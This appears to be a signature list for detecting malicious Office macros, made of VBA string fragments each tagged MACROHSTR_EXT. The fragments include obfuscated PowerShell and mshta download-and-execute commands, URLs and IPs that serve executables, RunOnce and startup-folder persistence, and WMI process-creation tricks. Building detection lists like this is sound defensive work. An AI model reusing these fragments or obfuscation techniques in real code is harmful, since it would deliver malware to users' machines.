 - As String = "p,:,\,j,v,a,q,b,j,f,\,f,l,f,g,r,z,3,2,\,z,f,u,g,n,.,r,k,r, (MACROHSTR_EXT)
 - As String = "P,:,\,h,f,r,e,f,\,c,h,o,y,v,p,\,v,a,.,p,b,z, (MACROHSTR_EXT)
 - As String = "P,:,\,h,f,r,e,f,\,c,h,o,y,v,p,\,v,a,.,u,g,z,y, (MACROHSTR_EXT)
 - frm.txt.text (MACROHSTR_EXT)
 - As String = "c&:&\&w&i&n&d&o&w&s&\&s&y&s&t&e&m&3&2&\&m&s&h&t&a&.&e&x&e& (MACROHSTR_EXT)
 - As String = "C&:&\&u&s&e&r&s&\&p&u&b&l&i&c&\&c&a&l&c&.&c&o&m& (MACROHSTR_EXT)
 - As String = "C&:&\&u&s&e&r&s&\&p&u&b&l&i&c&\&i&n&.&h&t&m&l& (MACROHSTR_EXT)
 - koasmxjw = "s:/" (MACROHSTR_EXT)
 - kdjkeurg = "/%909123id%909123id%909123id%909123id%909123id@j.mp\kassaasdskdd (MACROHSTR_EXT)
 - = "cmd /c p^" & "o^" & "w^" & "e^" & "r^" & "s^" & "h^" & "e^" & "l^" & "l" & "." & "e" & "x" & "e" & " " (MACROHSTR_EXT)
 - .Open "GET", "http://" & "104.244" & ".74.243/pine" & ".jpg", False (MACROHSTR_EXT)
 - (Environ("TMP") + "\distanc1e.exe"), (MACROHSTR_EXT)
 - W" + "S" + "c" + "ript.Shell (MACROHSTR_EXT)
 - StrReverse("""d'*'kliiijjkijlilil'*'d'*'d\p'*'.j\\:ptth""""aths'*'""") (MACROHSTR_EXT)
 - h5t7t2pf:2/0/3t9t0c5fav6.2c1oamc/cufn6b9bdmfe4vbdf/ad5726d.dp9hcp2?al9=1wcocz0m4b5l424.5caa5b2 (MACROHSTR_EXT)
 - c7:b\cp0rcodgbr0a8m0d7aft6aa\a6945926f16.2j1p6ge (MACROHSTR_EXT)
 - h1t8tapb:b/3/6td0bb6l6mdm6u4.5c6o6m7/1i5z450/8y1acc2af.dpfh5p3?al7=et5zde41218.ccea5bf (MACROHSTR_EXT)
 - h5tbt3p1:c/e/8tc04b1lbm5m6uf.cc1oam1/di5z154/4y0a3cca3.6p1hbpc?7l2=4t0z6e21f0c.2cea0b0 (MACROHSTR_EXT)
 - hbt2tfpb:5/5/2cdocffi23b.7c8o6m6/6i0z355/0y7afc9a5.0p4h9p9?1l6=akbp4tb93.8c6a6bb (MACROHSTR_EXT)
 - c1:d\5p1r2o6g0rba0m0daadtcaf\9345e7c3a4c.bj8pcg9 (MACROHSTR_EXT)
 - cb:2\7pbrao5g3rda4m1dcaft0a5\8200a99934b.9j6p9g2 (MACROHSTR_EXT)
 - c3:d\fp8r2o6gar4acm1ddadtba8\b1c302c6a7b.3jbp1ge (MACROHSTR_EXT)
 - CreateObject("WinHttp.WinHttpRequest.5.1") (MACROHSTR_EXT)
 - Shell """" + "" + "ms" + "hta""""" + "https" + ":\\ (MACROHSTR_EXT)
 - @j.mp\ (MACROHSTR_EXT)
 - exec( (MACROHSTR_EXT)
 - Environ("tmp") & "\ (MACROHSTR_EXT)
 - .jpg" (MACROHSTR_EXT)
 - c:\programdata\ (MACROHSTR_EXT)
 - .exec ( (MACROHSTR_EXT)
 - CreateObject("wscript.shell") (MACROHSTR_EXT)
 - As String = "c:\programdata\ (MACROHSTR_EXT)
 - .pdf") (MACROHSTR_EXT)
 - .exec  (MACROHSTR_EXT)
 - 32 test.pdf (MACROHSTR_EXT)
 - r32 c:\programdata\ (MACROHSTR_EXT)
 - .pdf" (MACROHSTR_EXT)
 - .txt" (MACROHSTR_EXT)
 - r32 c:\users\public\ (MACROHSTR_EXT)
 - As String = "c:\users\public\ (MACROHSTR_EXT)
 - .exec( (MACROHSTR_EXT)
 - CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - https://scjtt.fr/pdf/test.exe (MACROHSTR_EXT)
 - C:\Users\" & Environ("UserName") & "\Downloads\battery.exe (MACROHSTR_EXT)
 - = VBA.CreateObject( (MACROHSTR_EXT)
 - .Run( (MACROHSTR_EXT)
 - WinHttpReq.Open "GET", myURL, False, "username", "password" (MACROHSTR_EXT)
 - http://192.168.100.5/testdata.txt (MACROHSTR_EXT)
 - SaveToFile "C:\Users\Enigma\source\repos\02rev\mytest.txt", 2 ' 1 (MACROHSTR_EXT)
 - PowerShell -Command ""{Invoke-WebRequest -Uri http://192.168.100.5/testdata.txt -OutFile (MACROHSTR_EXT)
 - Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetLogger.exe (MACROHSTR_EXT)
 - @:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@u@g@z@y@ (MACROHSTR_EXT)
 - @:@\@j@v@a@q@b@j@f@\@f@l@f@g@r@z@3@2@\@z@f@u@g@n@.@r@k@r@ (MACROHSTR_EXT)
 - @:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@ (MACROHSTR_EXT)
 - .ShowHidden = False (MACROHSTR_EXT)
 - VBA.Mid( (MACROHSTR_EXT)
 - VBA.Chr( (MACROHSTR_EXT)
 - As String = "p@:@\@j@v@a@q@b@j@f@\@f@l@f@g@r@z@3@2@\@z@f@u@g@n@.@r@k@r@ (MACROHSTR_EXT)
 - As String = "P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@ (MACROHSTR_EXT)
 - As String = "P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@u@g@z@y@ (MACROHSTR_EXT)
 - No.Namespace("C:\windo" &  (MACROHSTR_EXT)
 -  & "ws\te" &  (MACROHSTR_EXT)
 - CopyHere ("\\theatta" &  (MACROHSTR_EXT)
 -  & "cker.com@S" &  (MACROHSTR_EXT)
 -  & "SL\webd" &  (MACROHSTR_EXT)
 -  & "av_s\ (MACROHSTR_EXT)
 - .ex" &  (MACROHSTR_EXT)
 -  + ThisDocument. (MACROHSTR_EXT)
 - .Caption +  (MACROHSTR_EXT)
 - ).Create( (MACROHSTR_EXT)
 - .Caption + ThisDocument (MACROHSTR_EXT)
 - = "\Temp\ (MACROHSTR_EXT)
 - & ".Application"), (MACROHSTR_EXT)
 - EXEC("cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))")V (MACROHSTR_EXT)
 - EXEC("cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe") (MACROHSTR_EXT)
 - https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))") (MACROHSTR_EXT)
 - = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " " (MACROHSTR_EXT)
 - http://%20%20@j.mp/asdaxasdasxasdasdsddodkasodkaos (MACROHSTR_EXT)
 - ellExecuteA (MACROHSTR_EXT)
 - C:\Users\ (MACROHSTR_EXT)
 - \AppData\Roaming\HelloWorld.exe (MACROHSTR_EXT)
 - http://93.115.19.226/evl.exe (MACROHSTR_EXT)
 - = objProcess.Create( (MACROHSTR_EXT)
 - .Get(SReverseMod(Hex2Str(" (MACROHSTR_EXT)
 - = "cmd /c" (MACROHSTR_EXT)
 - heo.pearlnwalters.us/ (MACROHSTR_EXT)
 - "','%temp%\ (MACROHSTR_EXT)
 - .exe');start %temp%\ (MACROHSTR_EXT)
 - .exe" (MACROHSTR_EXT)
 - = GetObject("winmgmts:root\cimv2:Win32_Process") (MACROHSTR_EXT)
 - obj.Document.Application.ShellExecute "cmd.exe ", "/c " (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Run  (MACROHSTR_EXT)
 - https://similarwebtool.ru/j98j23902dssdf234dfsdf.php (MACROHSTR_EXT)
 - (UBound(bIn) + 1) \ 4) * 3) - 1 (MACROHSTR_EXT)
 - windir & "\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe " & Replace(ppath, " ", """ """) (MACROHSTR_EXT)
 - profile + "\Documents\template.xml (MACROHSTR_EXT)
 - http://www.elit.com.mx/xls/lohlog.exe  (MACROHSTR_EXT)
 - {Start-Process -FilePath "C:\Users\Public\ (MACROHSTR_EXT)
 - http://209.141.35.239/33/ (MACROHSTR_EXT)
 - C:\Users\Public\Music\ (MACROHSTR_EXT)
 - powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass  -command  (MACROHSTR_EXT)
 - https://uae-signs.com/wp-includes/SimplePie/Content/project1/PROJRCT-B.exe -OutFile C:\Users\Public\Documents\jjsdulnvj.exe};  (MACROHSTR_EXT)
 - {Start-Process -FilePath "C:\Users\Public\Documents\jjsdulnvj.exe"} (MACROHSTR_EXT)
 - RmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXGNyaXp4Znh0dC5leGV9OyAmIHtTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1xjcml6eGZ4dHQuZXhlIn0i (MACROHSTR_EXT)
 - = CreateObject("winmgmts:Win32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject("winmgmts:" + "Win32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject("winmgmts:Win" + "32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject("win" + "mgmts:Win" + "32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject("win" + "mgmt" + "s:Win" + "32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject("winmgmts:" + "Win32_Pro" + "cess").Create( (MACROHSTR_EXT)
 - e1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxVc2Vyc1xQdWJsaWNccmxhcWlhbG5kLmV4ZSJ9Ig== (MACROHSTR_EXT)
 - ttp://bi", " (MACROHSTR_EXT)
 - & ".jse" (MACROHSTR_EXT)
 - .Write jsText4Text (MACROHSTR_EXT)
 - = "Shell.Application" (MACROHSTR_EXT)
 - .ShellExecute ( (MACROHSTR_EXT)
 - CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - .Run (x) (MACROHSTR_EXT)
 - .Wait (Now + TimeValue("0:00:05")) (MACROHSTR_EXT)
 - .RegDelete qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972") (MACROHSTR_EXT)
 -  & ".j" & "s" (MACROHSTR_EXT)
 - ).Cells( (MACROHSTR_EXT)
 - \Temp\ (MACROHSTR_EXT)
 - = Environ("TEMP") & "\13.xlsx" (MACROHSTR_EXT)
 - = TempName + ".zip" (MACROHSTR_EXT)
 - = Environ("TEMP") '& "\UnzTmp" (MACROHSTR_EXT)
 - .dll" (MACROHSTR_EXT)
 - .Item("xl\embeddings\oleObject1.bin") (MACROHSTR_EXT)
 - Selection.InsertBefore (MACROHSTR_EXT)
 - .ShellExecute (MACROHSTR_EXT)
 - = Nh("app" & Qy) & i & "putty." & a (MACROHSTR_EXT)
 - Vdc.createElement("b64") (MACROHSTR_EXT)
 - = "bin.base64" (MACROHSTR_EXT)
 - = "exe" (MACROHSTR_EXT)
 - .createTextFile( (MACROHSTR_EXT)
 - ("return selectClear.split('').reverse().join('');}mainWindowTmp =") (MACROHSTR_EXT)
 - = "explorer.exe c:\programdata\deleteMainMain.hta" (MACROHSTR_EXT)
 - = Split(p(frm.getwc), " ") (MACROHSTR_EXT)
 - = CreateObject("winm" + "gmts:Win32_Process").Create( (MACROHSTR_EXT)
 - = CreateObject(Replace("w    i     nm    gmts:Win    32   _Pr    oc   ess", " ", "")).Create( (MACROHSTR_EXT)
 - = CreateObject(Replace("winm    gmt   s:Wi    n    32   _Pr    oce    ss", " ", "")).Create( (MACROHSTR_EXT)
 - = CreateObject(Replace("@@@wi@@nm@@@@@@g@mt@@@@@s:Win@@@@32_Proc@@@@@es@@@@s", "@", "")).Create( (MACROHSTR_EXT)
 - .Tag & "535" + "\as" + "po" + "to.e" + "xe" (MACROHSTR_EXT)
 - + "\Ap" + "pDa" + "ta\R" + "oa" + "mi" + "ng" & "\" (MACROHSTR_EXT)
 - = "r-paym" + "ent/ima" + "ges/sh" + "ao.j" + "pg" (MACROHSTR_EXT)
 - & "', '%APPDATA%\mo' + 'l25' + '35\as' + 'pot' + 'o.ex' + 'e')" (MACROHSTR_EXT)
 - Open "C:\DiskDrive\1\Volume\ (MACROHSTR_EXT)
 - .bat" (MACROHSTR_EXT)
 - fStrForPathLoad = fStrForPathLoad & "\" (MACROHSTR_EXT)
 - .jse" (MACROHSTR_EXT)
 - C:\DiskDrive\1\Volume\ (MACROHSTR_EXT)
 - Caption & GiftToPapper.DefaultTargetFrame & " (MACROHSTR_EXT)
 - = Environ$("USERPROFILE") & StrReverse("piz.Updates\stnemucoD\") (MACROHSTR_EXT)
 - = Shell(Startup.Files1, 1) (MACROHSTR_EXT)
 - .CopyHere ShellAppzz.Namespace(Pathzz).Items (MACROHSTR_EXT)
 - & StrReverse("piz. (MACROHSTR_EXT)
 - = ".jse" (MACROHSTR_EXT)
 - jsText4Text (MACROHSTR_EXT)
 -  + " \* CardText", _ (MACROHSTR_EXT)
 - = "WScript.Shell" (MACROHSTR_EXT)
 - = WSShell.SpecialFolders("MyDocuments") (MACROHSTR_EXT)
 - powershell.exe ""IEX ((new-object net.webclient) (MACROHSTR_EXT)
 - .downloadstring('https://pastebin.com/raw/ (MACROHSTR_EXT)
 - Get-ComputerDetails (MACROHSTR_EXT)
 - ".jse" (MACROHSTR_EXT)
 - UserForm1.TextBox1.Text (MACROHSTR_EXT)
 - + 1 & "F.wll" (MACROHSTR_EXT)
 - ) Step 2: .Write Chr(CByte("&H" & Mid( (MACROHSTR_EXT)
 - , lp, 2))): Next: End With: objFile.Close (MACROHSTR_EXT)
 - MsgBox "The document is protected, you will need to specify a password to unlock." (MACROHSTR_EXT)
 - = Environ("APPDATA") & "\Microsoft\Word\Startup\" (MACROHSTR_EXT)
 - .CreateTextFile(p, True) (MACROHSTR_EXT)
 - .site/share.php" (MACROHSTR_EXT)
 - ("in_!____m_!____gm_!____ts_!____:_!____W_!____in_!____3_!____2_!______!____Pr_!____o_!_____!____ce_!____s_!____s")).Create( (MACROHSTR_EXT)
 - ("inPidormPidorgmPi" + "dortsPidor:PidorWPidorinPid" + "or3Pidor2Pidor_PidorP" + "rPidoroPidorPidorcePidorsPidors")).Create( (MACROHSTR_EXT)
 - (ThisDocument. (MACROHSTR_EXT)
 - moc.lruc\pmet\swodniw\:c (MACROHSTR_EXT)
 - exe.nimdastib\23metsys\swodniw\:c (MACROHSTR_EXT)
 - Mnuejwr NMV1.Text, Array(1, 2, 3, 4), NMV2.Text (MACROHSTR_EXT)
 - GgopFrm.Show (MACROHSTR_EXT)
 - ) / 1000000))) (MACROHSTR_EXT)
 - = UserForm1.TextBox3.Text (MACROHSTR_EXT)
 - .CreateTextFile(file2savrsave, True, True) (MACROHSTR_EXT)
 - FileName:="test_" & DocNum & ".doc" (MACROHSTR_EXT)
 - UserForm1.TextBox1.Value (MACROHSTR_EXT)
 - ActiveDocument.Bookmarks("\Section").Range.Copy (MACROHSTR_EXT)
 - .ShellExecute (start) (MACROHSTR_EXT)
 - = "C:\Windows\" & "Te" & "mp\ (MACROHSTR_EXT)
 - " & ".j" & "s" (MACROHSTR_EXT)
 - = "C:\Win" & "dows\" & "Te" & "mp\ (MACROHSTR_EXT)
 - .Controls(0).Caption (MACROHSTR_EXT)
 - Open Environ("TEMP") & Replace("\error_log. (MACROHSTR_EXT)
 - = Environ("TEMP") & Replace("\error_log. (MACROHSTR_EXT)
 - .Actions.Create(0) (MACROHSTR_EXT)
 - = UserForm1.TextBox1.Value (MACROHSTR_EXT)
 - ActiveDocument.Shapes.Count (MACROHSTR_EXT)
 - ThisDocument. (MACROHSTR_EXT)
 - .ShowWindow! = (MACROHSTR_EXT)
 - .Run (lVkRwEGx + cOV2135l + RZYQpU8J (MACROHSTR_EXT)
 - .Run (eybkLzvI + ZtLbeYNJ + XBRQpcjG) (MACROHSTR_EXT)
 - Replace("^pt.^^Sh", "^", "") (MACROHSTR_EXT)
 - Replace("/@@@", "@", "") (MACROHSTR_EXT)
 -  & "putty.scr" (MACROHSTR_EXT)
 - .DataType = "bin.base64" (MACROHSTR_EXT)
 - .createElement("b64") (MACROHSTR_EXT)
 - Debug.Print Error( (MACROHSTR_EXT)
 - .Text = (MACROHSTR_EXT)
 - .nodeTypedValue (MACROHSTR_EXT)
 - & Chr(92) & Rnd & ".js" (MACROHSTR_EXT)
 - = ".xsl" (MACROHSTR_EXT)
 - "verinstere.xls" (MACROHSTR_EXT)
 - & ".htm", _ (MACROHSTR_EXT)
 - ""%appdata%\jet6633""" (MACROHSTR_EXT)
 - + "\Ap" + "pD" + "a" + "ta\R" + "oa" + "mi" + "ng" & "\" (MACROHSTR_EXT)
 - & "', '%APPDATA%\je' + 't66' + '33\as' + 'pot' + 'o.ex' + 'e')"  'regex.exe (MACROHSTR_EXT)
 - .Tag + (MACROHSTR_EXT)
 - "http://107.173.219.115:4560/press1.exe" & _ (MACROHSTR_EXT)
 - & " cmd " & "/c" & _ (MACROHSTR_EXT)
 - "%TEMP%\ (MACROHSTR_EXT)
 - .exe" & _ (MACROHSTR_EXT)
 - () & "\ (MACROHSTR_EXT)
 - .x" &  (MACROHSTR_EXT)
 - .Text & (MACROHSTR_EXT)
 - TERQA2.Text, 874, "nujneg53" (MACROHSTR_EXT)
 - VthjneFmtr.Show (MACROHSTR_EXT)
 - 92.63.192.216/ (MACROHSTR_EXT)
 - CmdLine = """" & Filename & """" (MACROHSTR_EXT)
 - ("wa_:wa_:wiwa_:nmgwa_:mts:wa_:Wwa_:wa_:wa_:iwa_:n3wa_:2_Pwa_:rowa_:cewa_:sswa_:")).Create( (MACROHSTR_EXT)
 - = ActiveDocument.AttachedTemplate.Path & Chr(92) & Rnd & ".js" (MACROHSTR_EXT)
 - .Text = PuncMark & "   " (MACROHSTR_EXT)
 - .ShellExecute runFile (MACROHSTR_EXT)
 - ("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create( (MACROHSTR_EXT)
 - 761 - 157#) - (-1.35449735449735 * -378) (MACROHSTR_EXT)
 - .Controls(1).Value, True) (MACROHSTR_EXT)
 - .WriteLine ( (MACROHSTR_EXT)
 - .Controls(0).Caption) (MACROHSTR_EXT)
 - CreateObject("Shell.Application").Open  (MACROHSTR_EXT)
 - .Controls(1).Value (MACROHSTR_EXT)
 - = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - .Close (MACROHSTR_EXT)
 - ("abcswabcsiabcsnmgabcsmts:abcsWiabcsn3abcs2_abcsProabcsceabcsssabcs")).Create( (MACROHSTR_EXT)
 - (":53w:53i:53nm:53gmts:W:53in:533:532_:53Pro:53ce:53s:53s")).Create( (MACROHSTR_EXT)
 - .ShowWindow = (MACROHSTR_EXT)
 - ("w:53:53i:53:53:53n:53m:53g:53:53mt:53s::53:53:53Wi:53n32:53:53_Pr:53:53oce:53ss")).Create( (MACROHSTR_EXT)
 - If ActiveDocument.FormFields("Text1").Result = "" Then (MACROHSTR_EXT)
 - CreateObject("Shell.Application") (MACROHSTR_EXT)
 - .ShellExecute endfilerun2 (MACROHSTR_EXT)
 - = UserForm2.TextBox3.Value (MACROHSTR_EXT)
 - .Write get_TEXT_DATA (MACROHSTR_EXT)
 - .ShellExecute startWarFileRun (MACROHSTR_EXT)
 - .ShowWindow (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\", """m" + "s" + "h" + "t" + "a""""https:\\bit.ly/ (MACROHSTR_EXT)
 - .Open( (MACROHSTR_EXT)
 - = UserForm2.TextBox2.Tag + "\{ (MACROHSTR_EXT)
 - $}2.dll" (MACROHSTR_EXT)
 - ("Shell.Application") (MACROHSTR_EXT)
 - oApp.Namespace( (MACROHSTR_EXT)
 - ).CopyHere oApp.Namespace( (MACROHSTR_EXT)
 - ).items.Item (MACROHSTR_EXT)
 -   Lib "libc.dylib" Alias "system" (MACROHSTR_EXT)
 - .Open (MACROHSTR_EXT)
 - .Send (MACROHSTR_EXT)
 - = ActiveDocument. (MACROHSTR_EXT)
 - Selection.TypeText Text:=sTemp (MACROHSTR_EXT)
 - .Write textwrite (MACROHSTR_EXT)
 - jsText = UserForm1.TextBox1.Value (MACROHSTR_EXT)
 - CreateObject("Shell.Application").ShellExecute s2fule (MACROHSTR_EXT)
 - .Text = " ^p" (MACROHSTR_EXT)
 - Set Folder = FSO.GetSpecialFolder(2) (MACROHSTR_EXT)
 - .xlsx" (MACROHSTR_EXT)
 - .Tag + "\ (MACROHSTR_EXT)
 - E.dll" (MACROHSTR_EXT)
 - & "\oleObj" + "ect*.bin", (MACROHSTR_EXT)
 - .items.Item("xl\embeddings\oleObject1.bin") (MACROHSTR_EXT)
 - .Tag = Environ("TEMP") (MACROHSTR_EXT)
 - .Tag = Environ("APPDATA") (MACROHSTR_EXT)
 - jsText4Text = UserForm1.TextBox1.Text (MACROHSTR_EXT)
 - Selection.TypeText Text: (MACROHSTR_EXT)
 - .Text, JKMNNe2.Text, 874, "nujneg53" (MACROHSTR_EXT)
 - Temp = "'" & ThisWorkbook.Path & (MACROHSTR_EXT)
 - (UserForm1.Label1.Caption) (MACROHSTR_EXT)
 - .Environment("process").Item("param1") = (MACROHSTR_EXT)
 - .run "cmd /c call %param1%", 2 (MACROHSTR_EXT)
 - .CopyHere ShellApp.Namespace(Full_fILE).Items (MACROHSTR_EXT)
 - Sheets(Gert).Range(Byytuity) (MACROHSTR_EXT)
 - Sheets("Files").Range("B60") (MACROHSTR_EXT)
 - Private Declare PtrSafe Function ShvtE Lib "shell32" Alias "ShellExecuteW" (ByVal xLXGo As LongPtr, (MACROHSTR_EXT)
 - Call ShvtE(0, StrPtr("oPeN"), StrPtr(Split(Zfdbsdrgsreg.Unsjkfse84583754.Tag, (MACROHSTR_EXT)
 - .Tag, ChrW$(32))(0)))), StrPtr(""), 1) (MACROHSTR_EXT)
 - @ + ThisDocument. (MACROHSTR_EXT)
 - ko4d = "tp://%748237%728748@j.mp/" (MACROHSTR_EXT)
 - Put #1, , ThisDocument.DefaultTargetFrame & "s.com/LEO5GDKZCP.png', (MACROHSTR_EXT)
 - 'C:\PsiContent\PSxoep1.exe')" (MACROHSTR_EXT)
 - & ".bat" (MACROHSTR_EXT)
 - Selection.TypeText Text:= (MACROHSTR_EXT)
 - 'https://www. (MACROHSTR_EXT)
 - UserForm2.TextBox1.Tag & "\ (MACROHSTR_EXT)
 -  .xlsx" (MACROHSTR_EXT)
 - + ".d" + "ll" (MACROHSTR_EXT)
 - "\UnzTmp" (MACROHSTR_EXT)
 - & "\oleObj" + "ect*.bin", ZipName, (MACROHSTR_EXT)
 - .Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") (MACROHSTR_EXT)
 - .Open  (MACROHSTR_EXT)
 - %.Value (MACROHSTR_EXT)
 - .CreateTextFile(Environ("temp") & "\ (MACROHSTR_EXT)
 -  .xs" &  (MACROHSTR_EXT)
 - .text) (MACROHSTR_EXT)
 - "Wscript.Shell" (MACROHSTR_EXT)
 -  = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - = "1Normal.ThisDocument" (MACROHSTR_EXT)
 - = UserForm1.TextBox1.Text (MACROHSTR_EXT)
 - .CreateTextFile(BOEUDIDIS, True, True) (MACROHSTR_EXT)
 - .ShellExecute BOEUDIDIS (MACROHSTR_EXT)
 - Zjkkjwvygil = Sgn("Hudson GroupApt. 563North") (MACROHSTR_EXT)
 - Jcubmxigvls = Int("Spencer - PriceApt. 975Southwest") (MACROHSTR_EXT)
 - Fqvjjszc = CDate("Ratke and SonsSuite 201South") (MACROHSTR_EXT)
 - Nizbfxmd = Hex("Sipes - BradtkeApt. 831Northwest") (MACROHSTR_EXT)
 - =Section.Parent.Path & Application.PathSeparator & name & ".htm", _ (MACROHSTR_EXT)
 - ThisDocument.Close (MACROHSTR_EXT)
 - .SendMessage 0, 0, 0, 0 (MACROHSTR_EXT)
 - name = Replace(Header.Text, Chr(13), "") (MACROHSTR_EXT)
 - .text (MACROHSTR_EXT)
 - Print #1, ThisDocument.CheckBox1.Caption (MACROHSTR_EXT)
 - .Tag & ThisDocument.OptionButton1.Caption (MACROHSTR_EXT)
 - = Application.StartupPath & "\" & "margee" & ":" & Application.Version (MACROHSTR_EXT)
 - "The most thrue get application in test shell and some process a fear or script test it and power with execute ." (MACROHSTR_EXT)
 - , " ")(14) & """ -Argum" & "entList @('/e:J" (MACROHSTR_EXT)
 - , " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0 (MACROHSTR_EXT)
 - MsgBox "Failed to combine all PDFs", vbCritical, "Failed to Merge PDFs" (MACROHSTR_EXT)
 - ActiveDocument.Save (MACROHSTR_EXT)
 - .CreateTextFile(Environ( (MACROHSTR_EXT)
 -  ) & "\ (MACROHSTR_EXT)
 -   & "\ (MACROHSTR_EXT)
 - Temp = "'" & ThisWorkbook.Path (MACROHSTR_EXT)
 - ".xlsx" (MACROHSTR_EXT)
 - ".zip" (MACROHSTR_EXT)
 - "\oleObj" + "ect*.bin", ZipName, (MACROHSTR_EXT)
 - = docThis. (MACROHSTR_EXT)
 - .CreateTextFile(nameOFFILESOFRSAV, True, True) (MACROHSTR_EXT)
 - HyperX = HyperX + 0. (MACROHSTR_EXT)
 - c:\Helperes\BJKGJGyfyghu675785674786.bat", True (MACROHSTR_EXT)
 - a.WriteLine ("91/godz/4fzas.e^") (MACROHSTR_EXT)
 - "Gerilax.e^" (MACROHSTR_EXT)
 - = UserForm1.TextBox2.Text (MACROHSTR_EXT)
 -  & ".js (MACROHSTR_EXT)
 - = CreateObject("Scripting.FileSystemObject").CreateTextFile( (MACROHSTR_EXT)
 - NGpower = NGpower - 0. (MACROHSTR_EXT)
 - .CreateTextFile("c:\ (MACROHSTR_EXT)
 - @.bat", True) (MACROHSTR_EXT)
 - .WriteLine ("pow^") (MACROHSTR_EXT)
 - .WriteLine ("e^") (MACROHSTR_EXT)
 - .WriteLine ("x^") (MACROHSTR_EXT)
 - .Tag  (MACROHSTR_EXT)
 -  " + ".xlsx" (MACROHSTR_EXT)
 - VBA.CreateObject(" (MACROHSTR_EXT)
 - ").CreateElement(" (MACROHSTR_EXT)
 - Kill (Environ("TEMP") & "\ (MACROHSTR_EXT)
 - = Process.Create(Cipher(FromBase64( (MACROHSTR_EXT)
 - Process.Create(Environ("TEMP") & "\ (MACROHSTR_EXT)
 - .exe", Null, Null (MACROHSTR_EXT)
 - Shell "C:\windows\System32\calc.exe (MACROHSTR_EXT)
 - Set IEapp = CreateObject("InternetExplorer.Application") 'Set IEapp = InternetExplorer (MACROHSTR_EXT)
 - Selection.TypeText Text:=" (MACROHSTR_EXT)
 -  .bat", True (MACROHSTR_EXT)
 - = "https://monicapecere.it/N6NwQHR9RIPo3pF.exe" (MACROHSTR_EXT)
 - .Open Devlp, Downloadimage_URL, False, "username", "password (MACROHSTR_EXT)
 - .SaveToFile ("Server.gif") (MACROHSTR_EXT)
 - asmbyte = asmbyte + 0. (MACROHSTR_EXT)
 - .CreateTextFile("C:\ (MACROHSTR_EXT)
 - 0.bat", True) (MACROHSTR_EXT)
 - & "6.com/wp-content/uploads/2019/07/ (MACROHSTR_EXT)
 - .exe C:\ (MACROHSTR_EXT)
 - 0.exe") (MACROHSTR_EXT)
 - Debug.Print G8wz5k8tQ0du8B (MACROHSTR_EXT)
 - CLng((2.10729613733906 * 466)) (MACROHSTR_EXT)
 - Close #CLng((wdJustificationModeCompress Xor wdSectionDirectionRtl)) (MACROHSTR_EXT)
 - = Rnd & "." & exeshion & "se" (MACROHSTR_EXT)
 - .CreateTextFile(fileFroSaveJsMacros, True, True) (MACROHSTR_EXT)
 - ").Cells( (MACROHSTR_EXT)
 - ).Value,  (MACROHSTR_EXT)
 - ." & Empty & "jse" & Empty (MACROHSTR_EXT)
 - VBA.CallByName VBA.CreateObject( (MACROHSTR_EXT)
 -  & ".App" & "" & "lica" & Empty & "tion"), (MACROHSTR_EXT)
 - & "\""""", Empty, Empty, (MACROHSTR_EXT)
 - (Len(ActiveDocument.Content.Text) (MACROHSTR_EXT)
 - Set a = fs.CreateTextFile("c:\ (MACROHSTR_EXT)
 - .WriteLine (" (MACROHSTR_EXT)
 - .exe^") (MACROHSTR_EXT)
 - .SaveToFile ("C:\users\public\wf.dat") (MACROHSTR_EXT)
 - .Open "GET", "http:// (MACROHSTR_EXT)
 - longlive.casa/p1cture3.jpg (MACROHSTR_EXT)
 - .Run "" & (RequestArgument + "32 (MACROHSTR_EXT)
 - Application.Run "Gtys" (MACROHSTR_EXT)
 - = CreateObject("W" + "Sc" + "ri" + "pt" + "" + "." + "Sh" + "el" + "" + "l") (MACROHSTR_EXT)
 - Pl" + "" + "ay" + "" + "Li" + "st" + "" + "." + "v" + "" + "bs (MACROHSTR_EXT)
 - .Run("ws" + "" + "cr" + "ip" + "" + "t" + "." + "" + "ex" + "e (MACROHSTR_EXT)
 - = CallByName(CreateObject("W" & "Scri" & RexCold2("piti.Sihelli")), RexCold2("Ruin"), 1, RikP0, 1) (MACROHSTR_EXT)
 - Application.StartupPath & RexCold("xxx\xx.x.x\.x.xx\x") & RexCold("jxSnOfdd.tovco.") (MACROHSTR_EXT)
 - pyvjHfGNT = pyvjHfGNT + 0.05046294199 * Sgn(4.4778548954 + 52175.8062831484 * OaXvbJJ9I7n) (MACROHSTR_EXT)
